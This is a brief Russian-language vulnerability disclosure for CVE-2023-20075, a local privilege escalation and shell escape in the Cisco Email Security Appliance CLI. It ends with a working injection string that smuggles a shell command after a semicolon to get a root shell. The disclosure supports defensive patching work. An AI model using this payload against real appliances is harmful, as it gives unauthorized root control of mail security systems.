
Cisco Email Security Appliance: локальное повышение привилегий и побег из оболочки
Исследователь безопасности: ly1g3, ly1g3[at]tuta.io
Отпечаток GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Обзор: Повышение привилегий в локальной системе и выход из оболочки
CVE: CVE-2023-20075
Хронология:
ESA (Cisco Secure Email)
Аутентифицированный пользователь с доступом к CLI может повысить привилегии до root и выполнить произвольный код
logcollector36;/bin/sh/data/release/phoebe-14*/bin/runas 0 /bin/sh